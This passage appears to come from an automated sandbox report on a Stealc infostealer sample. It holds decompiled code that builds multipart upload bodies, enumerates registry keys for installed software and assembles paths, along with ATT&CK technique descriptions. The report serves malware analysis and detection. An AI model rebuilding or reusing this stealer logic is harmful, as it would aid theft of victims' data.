							E0017EA2F(E0017EA69( &_v16, 0,  &_a20,  &_v28, _t465), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "------"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, 0,  &_v96,  &_v28, _t465), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v56, _t465,  *0x38322c), 0,  &_v16);
							E00171839(_v56);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465,  *0x383428), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\"\r\n\r\n"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, 0,  &_a32,  &_v28, _t465), 0,  &_v16);
							E00171839(_v28);
							E0017E990( &_v84, _t465, 0x17fbd9);
							E0017EA2F(E0017EA69(E0017EA69( &_v84, 0,  &_v16,  &_v56, _t465), 0,  &_v68,  &_v28, _t465), 0,  &_v84);
							E00171839(_v28);
							E00171839(_v56);
							_t346 =  *0x383658(_v108, _v84,  *0x383658(_v84));
							_t363 = _v32;
							 *0x383748(_t363, _v108, _t346);
							while(1) {
								_push( &_v32);
								_push(0x7cf);
								_push( &_v2240);
								_push(_t363);
								if( *0x3836b8() == 0) {
									break;
								}
								_t351 = _v32;
								__eflags = _t351;
								if(__eflags != 0) {
									 *((char*)(_t454 + _t351 - 0x8bc)) = 0;
									E0017EA2F(E0017EAAB(_a4, 0,  &_v120, __eflags,  &_v2240), 0, _a4);
									E00171839(_v120);
									continue;
								}
								break;
							}
							 *0x383690(_t363);
							E00171839(_v84);
						}
						 *0x383690(_v36);
					}
				}
				 *0x383690(_v72);
				_t185 = E00174C21( &_v40, 0,  &_v44,  *_a4);
				_pop(_t367);
				_t467 = _t185;
				if(_t185 != 0) {
					E0017E9EB(_t367, _a4, 0x17fbd9);
					E0017EA2F(E0017EAAB(_a4, _t367,  &_v120, _t467, _v40), _t367, _a4);
					E00171839(_v120);
				}
				_v36 =  &_v40;
				memset(_v36, 0, 4 << 0);
				_v36 =  &_v44;
				memset(_v36, 0, 4 << 0);
				E00171839(_v108);
				E00171839(_v68);
				E00171839(_v16);
				E00171839(_v96);
				E00171839(_a8);
				E00171839(_a20);
				E00171839(_a32);
				return _a4;
			}

0x00173170
0x00173184
0x00173190
0x0017319a
0x001731a3
0x001731ae
0x001731b7
0x001731c0
0x001731c9
0x001731d2
0x001731e1
0x001731e7
0x001731ed
0x001731f0
0x001731f6
0x00173201
0x00173203
0x00173203
0x00173206
0x00173209
0x00173214
0x0017321b
0x0017322a
0x00173232
0x0017323a
0x00173252
0x0017325a
0x00173272
0x0017327a
0x00173290
0x00173298
0x001732b0
0x001732b8
0x001732d0
0x001732d8
0x001732f9
0x00173301
0x00173309
0x00173325
0x0017332b
0x00173330
0x0017333c
0x00173360
0x00173366
0x00173369
0x0017336b
0x00173384
0x0017338c
0x0017339f
0x001733a7
0x001733bf
0x001733c7
0x001733e0
0x001733e8
0x00173401
0x00173409
0x00173421
0x00173429
0x0017343f
0x00173447
0x0017345f
0x00173467
0x0017347f
0x00173487
0x0017349d
0x001734a5
0x001734bd
0x001734c5
0x001734de
0x001734e6
0x001734ff
0x00173507
0x0017351f
0x00173527
0x0017353d
0x00173545
0x0017354e
0x0017356f
0x00173577
0x0017357f
0x00173594
0x0017359a
0x001735a2
0x001735e0
0x001735e3
0x001735e4
0x001735eb
0x001735ec
0x001735f5
0x00000000
0x00000000
0x001735af
0x001735b2
0x001735b4
0x001735b6
0x001735d3
0x001735db
0x00000000
0x001735db
0x00000000
0x001735b4
0x001735f8
0x00173601
0x00173601
0x00173609
0x00173609
0x00173330
0x00173612
0x00173623
0x00173628
0x00173629
0x0017362b
0x00173635
0x0017364b
0x00173653
0x00173653
0x0017365b
0x00173668
0x0017366d
0x0017367a
0x0017367f
0x00173687
0x0017368f
0x00173697
0x0017369f
0x001736a7
0x001736af
0x001736bb

APIs

Part of subcall function 0017E9C2: lstrcpy.KERNEL32(00000000,?), ref: 0017E9E1

Part of subcall function 001730F8: malloc.MSVCRT ref: 0017312A
Part of subcall function 001730F8: malloc.MSVCRT ref: 00173130
Part of subcall function 001730F8: malloc.MSVCRT ref: 00173136
Part of subcall function 001730F8: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00173148

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2

Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F

Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1

lstrlen.KERNEL32(?,0017FBD9,",00181E44,------,00181E44,",00181E44,------), ref: 00173587
lstrlen.KERNEL32(?,?,00000000), ref: 00173594

Strings

------, xrefs: 0017325F, 00173371, 0017346C
", xrefs: 0017340E, 0017350C

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$malloc$lstrcat
String ID: "$------
API String ID: 2687269759-2370822465
Opcode ID: b659c0465ccd96a1476ecdd27c327f15bfec3e4a4f2d1f799653175fd554cbf5
Instruction ID: ba591fb590214283e3ffd506b8f5685a45c140b0315076123e67b2db4a7ece25
Opcode Fuzzy Hash: b659c0465ccd96a1476ecdd27c327f15bfec3e4a4f2d1f799653175fd554cbf5
Instruction Fuzzy Hash: 42F17436D0012AABCF01FFA4EC429DDBBB9BF58704F5590A1B91877161DB306F5A8B90

Uniqueness

Uniqueness Score: -1.00%

Function 0017D460 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 150
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0017D460(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v1112;
				char _v2136;
				char _v3160;
				void* __esi;
				void* _t62;
				intOrPtr _t65;
				intOrPtr _t82;
				void* _t119;
				intOrPtr _t122;
				void* _t131;

				_t121 =  &_v24;
				E0017E990( &_v24, __eflags, 0x17fbd9);
				_v28 = 0;
				_v12 = 0;
				_v36 = 0xf003f;
				_v8 = 0;
				_t62 =  *0x383684(_a8,  *0x383458, 0, 0x20019,  &_v28);
				_t133 = _t62;
				if(_t62 == 0) {
					_v32 = 0;
					do {
						_v8 = 0x400;
						_t65 =  *0x383770(_v28, _v32,  &_v2136,  &_v8, 0, 0, 0, 0);
						_v40 = _t65;
						__eflags = _t65;
						if(_t65 != 0) {
							goto L10;
						}
						 *0x3835d0( &_v3160, "%s\\%s",  *0x383458,  &_v2136);
						_t131 = _t131 + 0x10;
						__eflags =  *0x383684(_a8,  &_v3160, 0, 0x20019,  &_v12);
						if(__eflags != 0) {
							 *0x3836f0(_v12);
							L13:
							 *0x3836f0(_v28);
							_t122 = _a4;
							E0017E9C2( &_v24, _t119, _t122, __eflags);
							E00171839(_v24);
							goto L14;
						}
						_v8 = 0x400;
						_t82 =  *0x38366c(_v12,  *0x3834cc, 0,  &_v36,  &_v1112,  &_v8);
						__eflags = _t82;
						if(_t82 == 0) {
							__eflags =  *0x383658( &_v1112) - 1;
							if(__eflags > 0) {
								E0017EA2F(E0017EAAB( &_v24, _t119,  &_v88, __eflags, "\n\t"), _t119,  &_v24);
								E00171839(_v88);
								E0017EA2F(E0017EAAB( &_v24, _t119,  &_v52, __eflags,  &_v1112), _t119,  &_v24);
								E00171839(_v52);
								_v8 = 0x400;
								__eflags =  *0x38366c(_v12,  *0x383300, 0,  &_v36,  &_v1112,  &_v8);
								if(__eflags == 0) {
									E0017EA2F(E0017EAAB( &_v24, _t119,  &_v76, __eflags, " - "), _t119,  &_v24);
									E00171839(_v76);
									E0017EA2F(E0017EAAB( &_v24, _t119,  &_v64, __eflags,  &_v1112), _t119,  &_v24);
									E00171839(_v64);
								}
							}
						}
						 *0x3836f0(_v12);
						L10:
						_v32 = _v32 + 1;
						__eflags = _v40;
					} while (__eflags == 0);
					goto L13;
				} else {
					_t122 = _a4;
					E0017E9C2(_t121, _t119, _t122, _t133);
					E00171839(_v24);
					L14:
					return _t122;
				}
			}

0x0017d470
0x0017d473
0x0017d48a
0x0017d490
0x0017d493
0x0017d49a
0x0017d49d
0x0017d4a3
0x0017d4a5
0x0017d4bf
0x0017d4c7
0x0017d4d9
0x0017d4df
0x0017d4e5
0x0017d4e8
0x0017d4ea
0x00000000
0x00000000
0x0017d509
0x0017d50f
0x0017d52c
0x0017d52e
0x0017d638
0x0017d63e
0x0017d641
0x0017d647
0x0017d64d
0x0017d655
0x00000000
0x0017d65a
0x0017d54a
0x0017d550
0x0017d556
0x0017d558
0x0017d56b
0x0017d56e
0x0017d587
0x0017d58f
0x0017d5a9
0x0017d5b1
0x0017d5cc
0x0017d5d8
0x0017d5da
0x0017d5ef
0x0017d5f7
0x0017d611
0x0017d619
0x0017d619
0x0017d5da
0x0017d56e
0x0017d621
0x0017d627
0x0017d627
0x0017d62a
0x0017d62a
0x00000000
0x0017d4a7
0x0017d4a9
0x0017d4ac
0x0017d4b4
0x0017d65c
0x0017d660
0x0017d660

APIs

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

lstrlen.KERNEL32(?), ref: 0017D565

Part of subcall function 0017E9C2: lstrcpy.KERNEL32(00000000,?), ref: 0017E9E1

Strings

%s\%s, xrefs: 0017D503
- , xrefs: 0017D5DC
?, xrefs: 0017D493

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: - $%s\%s$?
API String ID: 367037083-3278919252
Opcode ID: 08a63f7a051e61aab646d423481b2f9aa3af428de69cf108ace6d5db8b746a67
Instruction ID: 922f5bbec7358da8df8b4d4e066bcf30c50914741db0ed238e4e458be2cbcad8
Opcode Fuzzy Hash: 08a63f7a051e61aab646d423481b2f9aa3af428de69cf108ace6d5db8b746a67
Instruction Fuzzy Hash: C951A27590021DABCF11EF94DD458EEBBBCEF58705F1080A6A609B3261DB30AF498B60

Uniqueness

Uniqueness Score: -1.00%

Function 0017B7CA Relevance: 5.1, APIs: 4, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0017B7CA(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t58;

				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				 *0x383730( &_v284,  *((intOrPtr*)(E0017D8C9( &_v20, 0x1a))));
				E00171839(_v20);
				 *0x383730( &_v284, 0x17fbdc);
				 *0x383730( &_v284,  *0x3834ec);
				 *0x383730();
				_t60 = _t58 + 0xc - 0x50;
				_t43 =  &_a4;
				E001716CB( &_a4, _t58 + 0xc - 0x50);
				E0017B446(0x17fbd9,  &_v284,  *0x3832e4,  *0x3834ec,  &_v284);
				E001716CB( &_a4, _t60 + 0x10);
				E0017B446(0x17fbd9,  &_v284,  *0x3833dc,  *0x3834ec, 0x17fbdc);
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				return E001716AC(_t43);
			}

0x0017b7dc
0x0017b7e9
0x0017b7ff
0x0017b808
0x0017b81a
0x0017b82d
0x0017b83b
0x0017b841
0x0017b844
0x0017b849
0x0017b867
0x0017b871
0x0017b88a
0x0017b898
0x0017b8a5
0x0017b8b2

APIs

lstrcat.KERNEL32(?,00000000), ref: 0017B7FF
lstrcat.KERNEL32(?,0017FBDC), ref: 0017B81A
lstrcat.KERNEL32(?), ref: 0017B82D
lstrcat.KERNEL32(?,0017FBDC), ref: 0017B83B

Part of subcall function 0017B446: lstrcat.KERNEL32(?), ref: 0017B556
Part of subcall function 0017B446: lstrcat.KERNEL32(?,0017FBDC), ref: 0017B569
Part of subcall function 0017B446: lstrcat.KERNEL32(?,?), ref: 0017B579
Part of subcall function 0017B446: lstrcat.KERNEL32(?,0017FBDC), ref: 0017B587
Part of subcall function 0017B446: lstrcat.KERNEL32(?,?), ref: 0017B59B

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID:
API String ID: 4038537762-0
Opcode ID: 28c159c56f5af49d7b52f55f2b19f781ed45edcfa0e1d2d94f64c5ea8e669283
Instruction ID: 588e2c49a2e0df40e987ba9bb5262158766abea4933c901882fe6394cd9e4f86
Opcode Fuzzy Hash: 28c159c56f5af49d7b52f55f2b19f781ed45edcfa0e1d2d94f64c5ea8e669283
Instruction Fuzzy Hash: C5215EB280011CAFCB41EBA4DD469DA77BDEF44310F0484E1F60AE3221DB359F958B92

Uniqueness

Uniqueness Score: -1.00%

Function 001730F8 Relevance: 5.0, APIs: 4, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E001730F8(void* _a4, intOrPtr _a8) {
				signed int _v16;
				void* _v20;
				signed int _v44;
				void* _v48;
				signed int _v56;
				void* _v60;
				void _v64;
				void _t19;
				void* _t22;
				char* _t30;
				signed int _t31;
				void _t33;
				void* _t34;
				void* _t40;
				intOrPtr _t42;

				_t19 = 0x3c;
				_t33 = _t19;
				_t30 =  &_v64;
				do {
					 *_t30 = 0;
					_t30 = _t30 + 1;
					_t33 = _t33 - 1;
				} while (_t33 != 0);
				_v56 = _v56 | 0xffffffff;
				_v44 = _v44 | 0xffffffff;
				_v16 = _v16 | 0xffffffff;
				_v64 = _t19;
				_v48 = malloc(0x400);
				_v60 = malloc(0x400);
				_t22 = malloc(0x400);
				_t42 = _a8;
				_v20 = _t22;
				 *0x383640(_t42,  *0x383658(_t42, 0,  &_v64, _t34, _t40));
				_t31 = 0xf;
				E00171839(memcpy(_a4,  &_v64, _t31 << 2));
				return _a4;
			}

0x00173100
0x00173101
0x00173103
0x00173106
0x00173106
0x00173109
0x0017310a
0x0017310a
0x0017310d
0x00173111
0x00173115
0x00173127
0x0017312d
0x00173133
0x00173136
0x00173138
0x0017313e
0x00173150
0x0017315e
0x00173164
0x0017316f

APIs

malloc.MSVCRT ref: 0017312A
malloc.MSVCRT ref: 00173130
malloc.MSVCRT ref: 00173136
lstrlen.KERNEL32(000000FF,00000000,?), ref: 00173148

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: malloc$lstrlen
String ID:
API String ID: 2312681527-0
Opcode ID: a498f4ada179b093812e12d32fab0058ce64337ea8a29dc3783b3c7beed74c94
Instruction ID: 8946a524c1375d2d8e814b9a7ac12e6295261ccbbe5b86c2ecb144a406c2f5ea
Opcode Fuzzy Hash: a498f4ada179b093812e12d32fab0058ce64337ea8a29dc3783b3c7beed74c94
Instruction Fuzzy Hash: 35011E31D00218BBCB159FA9DC45ADEBFB8EF55730F108216F925E72A0D77456018B94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report stealc.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: stealc.bin.exePID: 5836, Parent PID: 3324

General

File Activities

File Opened

File Attributes Queried

Volume Information Queried

Windows Analysis Report
stealc.bin.exe

Function 0017DD84 Relevance: 46.7, APIs: 31, Instructions: 159
libraryloaderCOMMON

Function 0017CECA Relevance: 7.6, APIs: 5, Instructions: 66
timeCOMMON

Function 0017D193 Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Function 0017CF89 Relevance: 9.1, APIs: 6, Instructions: 122
COMMON

Function 00171010 Relevance: 7.6, APIs: 5, Instructions: 58
memoryCOMMON

Function 0017D1C5 Relevance: 4.5, APIs: 3, Instructions: 22
memoryCOMMON

Function 001710FD Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Function 00173083 Relevance: 2.6, APIs: 2, Instructions: 51
COMMON

Function 00171091 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Function 00172F36 Relevance: 1.4, APIs: 1, Instructions: 111
COMMON

Function 001792E7 Relevance: 42.9, APIs: 16, Strings: 8, Instructions: 857
memorystringCOMMON

Function 00174C21 Relevance: 3.0, APIs: 2, Instructions: 42
encryptionCOMMON

Function 0017E08E Relevance: 148.9, APIs: 99, Instructions: 424
libraryloaderCOMMON

Function 00173786 Relevance: 30.2, APIs: 13, Strings: 4, Instructions: 443
stringmemoryCOMMON

Function 00175467 Relevance: 28.9, APIs: 19, Instructions: 351
stringmemoryCOMMON

Function 00176CE3 Relevance: 28.8, APIs: 19, Instructions: 309
stringmemoryCOMMON

Function 00173D9B Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388
stringmemoryCOMMON

Function 00178E1F Relevance: 16.7, APIs: 11, Instructions: 248
stringCOMMON

Function 0017AEC6 Relevance: 11.4, APIs: 9, Instructions: 165
stringCOMMON

Function 0017B2B5 Relevance: 8.9, APIs: 7, Instructions: 115
stringCOMMON